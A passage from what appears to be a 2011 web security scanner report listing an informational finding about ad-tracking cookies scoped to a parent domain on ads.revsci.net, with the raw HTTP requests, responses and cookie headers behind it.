Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsiPus_8M_3="MLsXrqMOJjhv5pB0GuK8L0HP6TxvTFfsq5kDvElXUq9TwKhTQq2Ubnlep6FA0C8r6htCP2PSMq515hwVRH+xujb+G1htaTXszdeYeilTKKO1RBpCQ0t0e2bIMKUlM6bClRwGcxa+rMOmPp+zucy3NXWBXF98hg0FKNucuRxIwwaBqYDZc6gnhLN9X4uRT1JhPmDtba7wb1Ny0LW1ZiGWsLWEcpgifGwVEE5eaMuOG08OuIdls6ej9CGChzNgtGsTz2fAmDRoIO7NRmVGO2Fu0NmIJaCq7dRuHscaTiC32VFYaA+rHHFt2+c5dlmsE3GVMKlrsnqqSWAF0XEbT2iXL29pLdhi4J90vyDRyP5v7MXOQ2SnexhjoTI5feC3ziZujOSKbuHw0UZzk0vKfGo2UI5kqXNXbmSsPn/zT4VYlQl3qI1tr+mET3Lk9JcNnCeolcuo4nIUc2MVAWhQju5cRXdKnK346bdbLyeu8iNlZNnzOXbRFRhJZ76I+GGWQpAXJN3wVH7fm4hpae41QS4ebXx2GAiSPiFanMRGgxk1KKyk1R9inDRhNoP+NEFnk4QCIn0xHXRkmHQxFNYR16es6aFmKW0aXwrfjh/SleuLcnNVOtmkxOqqySqyGprAvdvjNPMG6OSZC+mmHMulB/MVrHv+J4VtHZPz4w/D7w00KwgJ9/gt0igYOwCqs7sTKGjscJmbv5uKi1CLBZ30Eert2NaeyUoIBxi2ZcULwt/pNT+BN4X/jzNpqtAsS2eWt+6k+t1yjORdslvobLE5uBgu+QoIj9KoAI/xn5tbSJNbh/pqDYFgbWX6rn8LBlqlhvNirM2Iac8nZobH2ruya7LtRtlAMmYS8q2hdLyVG/f3NGmzPJFmiflLeVXcvRJm9fM+C44nvTf3dth3bO0BRTJJRm1xoSl46U/Jt/klHQfgwwR9piSC4JNxvNN8mx9N0NDk5r1u1PzRR8T7hTV3g2qe8NSmVo7wBTml4xNMgbY+g8FGDaZ4l+tgQR7HDojsJ8vv5P8akjydW4FTJxg="; rsi_us_1000000="pUM9IzlDOAYc1U2ENgyhQng1Be7z7sLKw3jzv8rD7yutq5CDQ0Q8aZKAy3gHZduyW7zv43bzfN67P/5NzyurwWondhYeen7CWIWgxbqCdmY3a4wLoRcc/Reee8KNhj4BKp/euTN0DtKguTSkIDJ1vURStfWhCx5vdVhSw4H7sbZeLBt7cLZmC4R4RZG7fRG9H8EygB0KjrtgkS5/khqQTfWqMN+CQ7Re6dOsKbW6QCZw8Dy0JZ2jJgBRRN67npYQXY032n3+oCQ3q612E1CGsBQiuqZsfA5dZoy+uIW5D/D0r/XwM9wGw7l8HY0p4cwTPS7esM3w5lbCklgt/yNLi8Ih4fiXI7Kt2ZkX7dRZ8f8wICWkrpK2Tyqz9lk8gjR0ud3Njd4DLEQYQ52MTXD/E8REHhIOJSQiiGx50SD9yT9a5K72SQ9s6UpKFIYHCjsW0XJfDiR3UsJK+8WYg/VZOgiFw7QPdBC2+b/LiFDN627XlM3IUocsS1co3tAWOBD+rhB7D7TzR2PQGhc7PnHKe5+pg4ay4m/MuURvgG7SG6kmVhSHwZtzPCtXe9nVJwwwqzpGdKp/JcVvqe1cR+AO9nk+pZTXEGB2RR8cakFnhvB+5QR/xTMLSr1QnREn5KuWpPBdmk8ldJd6zXxtBO7Tkv97Z/BtuApaw7WZiT1IMop1RwvMrd+pw054zxi4C+4/HCdkcdis4luyl92Y1SpKqfV1PzoiVwa24vHOm917syTpes+2sYgv3uTbICeM9/Kj4fRDls47jiyDeFhZZBL5pnaLvuwzkq+KlywCU6mHoBjaCbAPlF65eyavgRSySOAWUWo/fQKkSGdsNC2QzBtlF0zyE6T2FrNMt16Pw9l+yFaLlbt0tXHwsqBkzuZWx3y0C3if2kww3wr+Z+JovuWA6Z8M1/r9DCXyrPTIVh9T9incB64/hgqfDK0QL013XAcR2XOJyAAA5vFdniF49hWrT8fR9uOV9c+kzEPBXwcXL0OMdVMUbcPkqnk+kVar3aG0PayeJwXSzuCI2pgzWkLtYs26LeQYLxmsjjHs7vcBGSpavo22HaEjA1ba4DaWCB+bFr3k7XVpbB5qwpNHRkCkZ77/UBJv01pt4XC4DAkfk3Ez7bHArrmb2X25X/l2iGpuYTDqCuAeR1whZ1F0erqLBzvaSriTPduUpkzo8ILLpKXx2R2HDOei+clQOMxb0cM3b4j2LoecLbdBeykr1KInZlRj+7F9LQMTvAHxlfg3BY6u/iHTp0QEKNmfkGRZdVhLGvY7Goafa2yt/lBjKcISAa/c80uQzhksgH6pF0cmHfqP2P02qSFNz6eMJ74hVELzN5l4DAgFOGEv7Yff4YzdAI7OC5bP5U6iQDkFclbNcZuLB/28xD4b5YEtGy2QydMcWl8nIT18I/9KHFpZKfmBXkImm6gFbB2MudKZEtB76izQuckAgZVlJ4V5t9qhXF62TO6EdyPnwlW0lCD85YsJI7JgNDWC95j/iAx5W/1ydJH20DePSoJcp093rdAxL/ln"; rsi_segs_1000000=pUP15EOheQIMpzaxu2F29/z4Oss1gLZjurYNWhPokQNisncWnkGNdTd0q7tfEV6W8KYgNWe1zVP+wCE1bPgjy4/MlMu8fmb//NXar7Y6nPMFsDruxPoho+utFRzl9KlIWGX2y70JUsCX3oMTJVeFpvQWeVG9EvO7g73n2XzRwEEq30oSRzL21IY3cRpB7Vmzy1iqPeGQBJS5IhTr1vDFC8xHxrtUssduWU5dSZDN02PVSvaPDKNavJVcnziCHODolt2y79Os6T2ZV7+uWOw6Bb9lnQdZ7gG88UntJ8C1+1XhcYHsfqd+lQ7Pi+ZYIf3rQwj4PSgc/RykJQiQCXjj7Rs1RundYD6Xg9I/w0FdmmlwAsf1Ud7bhVj1rccGdiwOKwKHslwVcWlooMuuAHdQ/ysL2mjNHQ3Cr73mIpKz56ZnRkKCUpv6L2FoypfDkuoIGiYRen9fnjxJ4gwcFowoMvUN+bMu+LYYU73iVUgpezphlKRKe54pCx/I1J3qADaapZY8OFHAOQ0jQik2eXFisC4=; rtc_VOiH=MLvntzE1JhpnJ5HL3vy4joSEnCpKJDT5hxKcHQSZ6JT8vuKgWFC/KkqDtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezvv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxb1QUwtrua8Ucrzg4vzJfn2PJmysGqjNTvrijT1zILLnNVboDI0g45fjWuY9xH/w4vXFZIWF8FIwEMvdWH4eH8msjyOFivcs8ZbMChEuxcQzs1OPTzt4/z2zQfg+U0r2ByE1yffOIkzJBe077NS+U+WgLoszKteBfOmbcvMjY4b9XgsSwNJl8xGNb+X2Vb6EXKUC3fnrpz0GxrzPRV0tE/ZCez3oWLso+cS20bk6a0T/YCM3Kx8YrNo+l8XEWwiR2vnYY/I4nLrE1ylDCslJBrnaYybrI4xUsRiGKkESiEmurOABMWe0iDI5s5dohjorfehJRmVPiseZIe1egNAPJ2sDREJJHaZCSOcmNOYjUv/jwzKPJAjAECbL+cBvQr9ESvkSC+oHALVBt53eN50LwfQvfY3vyqRGQhsyXLWCU9fKPqqqDyX31vUK5Qf4DHgePVycIZgR9/yiEg7u4V2XdfR1wx04lAxdkugCBLGP9bB95zGzeUfSMqL5NIh67S2zR4llWtdhHd00uXtcvIBe441RKNUAei9HPhEe0YjK2TjVyvleGWd3IH6E+wppl37hU1Qr3EGF4S7lDkTmn3efD2Lflf7XlHDRQrHKkSVbY53RWKhsxILQa+WWsXJfctWAmdEFxD4FnfOtpaXu7/9jcF43udjj1nxKAdsjyRGHIsB29cfDE+uLGeu1yIN0nZMyUb1ZxrECbXaG6AcZbZR7Yiy8e8YWXK7sBkaWr681aT6c4zOE78rzFEGQgwtz2vpVDZgB/cfPt5PumOWqJZQXSb3qUvzPyRujoYvnbiA697Iy+zNLvsrPK8GtNiV8huZT0y/9F77ml5eyclod+doU5GW1yisvw8E/aRqFw6fr23xlgtO2fYKBE0Mi++c4Go8uyHw3anmYqE3t7GgTG+hGsTuq8y0B5Q6Dpi8GSXBFbet7bbI7167eCobHEvfI/OQGgSO8RLR/kANo/suQA4r/efNzmetu77Pxs9uB/aBR5P3sDCD+crKivO87p/+F0pRzqRqaHANJ2CvdDWpF9SI7YZCS5pqD4Lt4XmKza1Vu22BCIVPxRudLr4+TIbfGcJYaUFSKN70dPk/DBKCWL8lktc5EvR/4t54LIttHGsLl+i4yL9qTdiMCVNNA1RVRVPQdPiTe9zez152RomS+7zblx4JsnVu0ptrty62RkHKO9TWHgLEWEo0zESWYENo/8ZNkdwyVeBZcMn2QlPLTUlMewbcVPQ0fCUANX0vBuKWgABd1yC1zLx5SkQ1unCrS9MAW9z0N7f1i12nKhxmvVlF2mR719fXVKDWIdcpihc3oWKs9q4M6O1SqkP762OqdSbf/mfAUmIp0GFtJ9qQ5sHJB3DOw1CN8cvvhlekXD0/HSJQCAxiquT7r2mgGRtQj017jkDUu

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8M_3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8M_3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yRO_="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8agCQaitfp6FA0C8r6hsCwn0LMa6VYK+RJFJdFHj+2+AkDORAeV/lN0GzqkDxiaWPrUzeSRTDK2Me9qyUjpSsX73sxbowAuFyRMBuLfYcr6fFEv89nvrU0fHKnzuhl7nYiag/s/1N34M3BlDS6m65V5znD3YEHJSuuCN4laK5Ey/MV16Ecne/pGaO9M5VXBjMmiGTCRtslZElDeA/D0Mci9ZT0+mtTpb4b9+jIw6JHy9x+kuFb7OetR2Jm8uzVIGCrepzwC4BD6UAnaxmTDlVk2xOmhFq9l/4uebjzrN2/N2zHbjsz5Zur30KF7L+BIJ4WxeDYINBTx2Sp/RPconlKLpwejbocdAb+G6p+egbaATDj6FskR6aHGW8mdhgdLIVBmuTSvdqtLVGfeNnjlQjgrULB3I7aN1yFsXsJnXo36VxqQs5NmHpLDZw+iQ/bw4/BG8T0VlTYceZr26z27avYq+Cfyd3CNCybazHCBBn1KT0I8C21mNk05bRcWz+exBmPDTZILNnXZ9l3ZX2LtNY60plgepYaLc1C3Xg7EVnbokG1DlhLYmUZZKIV9fSnp+jwsksXKxSoALg1MlQbw/QnOwasiU8CM4UPsX8XFC89zy1Zs4EYy02jXciOG/18vFL/RlRxPoEaRnpMuEPoG86RzldAR4krCUK3a7Auajkyr8PdnJbPYyMFrMEWyBJzbLmWhap/S52XoMDxXJpiCjcS/hfEEo4/A33PvhFo7bsdJGg44Yn9PbZEP/ZgvmIilbokZVh2SFUXOiABy/XH+dv9C9SsAQwWUUf817//oWERttQGQIxNTJf2iSqkOSeObObzxz4xseVV5qjpH9ie/homRaDYgTDsVFOiuJM16tq1oNANlWlciNzsmx+oWXS5mY2SkL6ykEuxMOggtc/tNtHijd6kRKJ85BqXbayXlCuoTWTrzaM/Y6B8BlcTT+AB2Q+CUAlPstVBxn7H+PtvwLR83UhvN2e2J651xvKnnTz6ie4"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+Tw3jz/8LS/qtrmdrNs/WP+Yp2PG2vaRqum4ZlwD+xtF/WzvYPxjEEfeOkBLjjARTnD4aJiuRsxBVtxVfgrzeB+vacIU85DgSioT4nm4HVuD2xiJAmyHOx0VIC+cT5Tm/TONrwJQqLtWqIG1BjOAWGXsU1OFFx7PNMgx1jVs9rfHpUK0ptUWrCq0NXvl9ccOEQS95bvPqdO4/Qp7ZhlVeRRVlUWMNUGfzToSrGQgCPUrUcN37/VRHr6H1nCZSgPhPPHeyB3hYiJGN0ITV16/VitLkpMZuoJ6tMR8Pj9bGLsFzC8q3wVCx7VcICwl6Beddog2FdLgJuI3BDpeI9+Hn59CNFZAZk9dT4XUySi3RdejPOvh5qNHs2dor0UHmrWx+3HEQig6C8WR4Tk+gyf68E5HFX8Gz09PxumoTwzraeb8v6z3XUq9w+TfFefoW9hI8BhzC03bcl0T91vidNsV1EbrM8FX4LGKBtyUngScVq9oxHV16eQQwjU5urgPD79m9Egj5YPqG/VUa4RSsRL21R53Ehv/4S41l+WS+Bjf/Um50FIT06oKMy3GOMJZdUURwYOyHMtzHH6MOoV/FUuwMatl0geqxZN80UlltdN1e0bBK9m72w9F+WQl658EApQbmZtLlyiWwWyfX6eeATU+kUtpMV21TrjhAUSCUaVwL96XNHELyp8Ak8G+6f39QiuNX9sYMuynQBmDTk3U2fysKpA0ULdTsbgEYRNxte1+V4Vu5pclZS/SluGYRGqFciUTHH7jlTzS7r4Od1PDbqHOXOoGhgdUKRwlGCtvhxJ3zpMHMTeJBspSli78zJal5w2RgiXvdzsle4GypMSBJTlBFpkLcvXbok3eHAtIL39rfw/UIu83ImxrDg6omRtKhpulQh/pq3wqDQU9gGDUli1ghFaisbVgsdV3PjWu3j601kvhkLW16UigGd9+OTn40j3PzSb/7R5TLzA4EX5/kGiqHVbqo2Cvb85ZjaR7Qrjg6SK8e3Mp599pwtMyOunLVy+iBHvu4DfAJjlbbgaDbUs6pVpnHZVtuWHaiPZObNwsG5Erf7AsnjNK8stheIbjqt7SVesSTfNLtKEi9Je3YzU+7itqr63frpwbYsE2f1Txe0j6ACMbDoGvhxPCKV6ozfN6H+1ud4jOfQYu2fJMR1UEowTWtgLSmAKX/F80q/AiKO4VFc9ZQA+Qc+2+04tj8hCJ3savNPbQTmT0AJNduUYRDmmpXLkV60SI+qlYWoWUqTJ6YxgY/JULB9TtnmZNjrH7/6l3OvmOQ8jeccNp7gsZNaCBd+L7uNn+HnF7zb4Yr2kFwcp1Ayq3PRqDmxMGHIoPtEJQBfc+nc3io3eYrDgGd4YkqbVcVg0fCaYKZHMNTMQZP7eGLxfDrowoJUkdmN/yOvbv/FzvYqmx7xBf5dbh1P1aFX/I703GMAJL4bJnpHCTF060yt36DPGxFGI8aUihgHsQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1274605&id=56918&id=315889&id=715901&id=1023315&id=725071&id=1268392&id=1198035&id=1049794&id=74560&id=593881&id=1264419&id=86237&id=926097&id=1006089&id=1196051&id=1147048&id=1086731&id=1284585&id=1086733&id=1044410&id=1093100&id=1063912&id=397181&id=1044578&id=1063916&id=1041270&id=1049769&id=1049770&id=596293&id=576685&id=1044587&id=596291&id=1049772&id=1063911&id=1063910&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:09:55 GMT

12.18. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&type=gif&csid=K10145 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305608&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsiPus_nlnh="MLsXrqMOLjproBAxuuKo7xC/v0lmTlecDqSiToO8phWAnpO+YSTKFqU3TDxxVRk18Y3VCTjL0ah6bV8hWqwKPejoJrdpYW+maSaE+SE+JYHAqw/wQUT1qX7wDv68KC/ogKITsb9dC8gdu0uA7sN+LTYfo6fDEvy97fr0sfCIWg/dl5X5uzDg9KOQN8uVmwRirSVhkHVm0KyQbnTUGsc2ZQvcAhR0xzocc/zo82+gM1RCIH+HSCGErtUUZc9RJCGEmtyJa50VtG6uhU13oDsoWTBcH+pKwA+EFmS5nr9l5tca9Gn0G15id7IFw3BzD4Tvch7eJWmhiUjCLEDfLl0gbdj+ckvbdlfP3VayclAOz29lDjEAIM7evWDsxAp95So743zgvTRtdCe4oiCVigVSbNlYtf2gls9w4/Rbe+tmpqScTnQCnaNQwIizICQvruNgmFH/6+lojkVGlNDz5Ky3rTgx4Lb7FGgQFqtNmVDkIrLBzE5vX3eGdFDbFFVsTp88ZqFbUCErpL3v70oO0vaq8n4dLXBDnlJvcS6JdnjRk9xkIe69ZW1oeNhnpjXeiCaYl4LhoNHPSyKqNQcopy21Lq6Fx65Ehc1L/Zo9a+T+ilMYjIAgks58mh41keirnpuezj6yRhV7JX2rrCEqT/hJNxX7y2JcARkB1nMRRB8Zj9SHmrYZ638tSYG3b90lhgWBLXv0LDarrDfBS1eszRzd+qY471tll+fm92jvMhKTIDlOLkVopd2x+0aEKBYWNNN3k3toyRwrKsE4hBORWYMZSTdPaYPOQ1UPnovWcZpohcny7FCN8FH6hqZu6WJ0bE7KXD9+iEBSpnGNcjuJ57gNCQUER3dnilXxUU035Ub31YKYngAcRd67M4oL+VtrIgTE1ftBWaJU5hTHGEe4Nz2Zci3y3xXI6G85vV5OQZPwMjZ5we4k3N9bf3L5Db5oz9FeCksBpZVkBjxTqBRYGfoO/jdzHDYmpioDH7T49AzUBkFAhbVGacpYyYl5p0wOriiZcw3ZFQoSD4yzLpEu3nFozzx0"; rsi_us_1000000="pUMlIz9DOAYU1O2WA3Nf1wgg9Tpj7P+Tw3jzv8rD7yvDmvWDQ0Y8a5KAq8B98fA1QmRNDddtH/dK+uIMHXn850oVpZ6hBQpRqWE9VPS5Xy7XGW2RoRccmRQldIeS8HXSTpZFxGDjrLBA6xGO31q5lEKg7q/Zqa3Eh3raYFPi2iq2P/WUJ8LzKuLWOFTjNfjCk/0VNg4UoWYInFurSNSQ+aUh/C47rdGNAf1Dg1oVK6qn87HdFN4KIp8qp25VM4TSqlPz6cg1zQD2GwFFfzhKwHp0kGxTZK6jX8ZnXISB8sXcy0D55JrXRUETl0uoI4QVbKEZF/5dx1gs9ptsf6SthAIG43IlegqXwtMLrqqpTk/JyFQ2StgdP9FYuRHDpLz+OHzUQh1vrm5xKjX3+Q640exxVIfbO5itfUNxo5BZqgcjww3GikxnYg5fSYMvW08WJalwrMzbnGLl0KXXJ46jOVLE0Rb0yvlFoNktRzKMye9waAvctfzuH9EHwibUfXt190PEJ4A+Sg0AcAp7kOwVeDkiN2MCb3r1WPXuHm3y8pbsO2binEZAAOMbMCz6CtX91Rgn2EzUAx81QjGglnztOuUFRFlI7kjMQeXLGKWBRZdSe6eYTB6Lnh18LdQ5agXYqBlP5eTr0pdews3C7wuHkSy+cjD2XlZOYEMXQn9PuBTSjNA/XlMSRQqc9WomgO0U1VW9Z7NS9+gZx4/DR1GwAkIBjPHU5AlJIaaxmJASLwvjIxrX5KW3zZGf/mjfA2cFyChzAGmctIpu+Vd7ARiWWqAIi6cgvytaV2BRdBlrXFkhSMrlmfawqiVLWJ+RfqZK7gaVrut3WnrJOVMXXqr7CtxUK6a2Pn/1EfyMPFJStSe6uI0JDgJOOUXIh0/QlT3bEiUUzklRDfiLQQg9qZceXx0I0CFus/5FTGi3aSsJ/iOmQ7U7lJyS2obs9TpltQ/ufeib9k1qvREJYFLBR0z5bFhcp5yzXQbaEFx8ymNOXnS1itZUINjWC8jdy5PsuUT+JDJXPtf/HEu1N4a99erdLdqPuj+ki8RVgjGf1QVPdRYQN5Ikpkk0MRA5SSlsc87Euf+syX6f0SaGqcOA+LMY28by9BOfF4CjwojIYLQA7CTMmShGLD7QIoYNPB9pH3S/WcquP8g8yavfDQBU+QwcMOiGx/GukIS2j/H4BDvCbywCrbiyLf0IsbRg+/vZyQlnl03yTrzUhfJGYADGtKLHujYIlWVJ2juevHA9vZrI2f0zNZZFT5Ox5BJBvBcQLenCuVaRyx9ZwQYz5yUzskZStzZiHbYlVsH1sWxuxzg1xSosd3Tq17MFdy1sDZD30OeKip7ei44DiArBocEjjeNpiyKtXSdt7rrwtwl36hGrMTrfhX6+/bn0kr2hGgVBE+oKtf3pVCXZqMHah6gq1RieAs/KWLv+Kc38x5h3OOZj9/KY5a5+y4Drg4l7b9rJsCgZP8zktKSaeNFEIDZ35+CtVymuq0xkEBJifIs="; 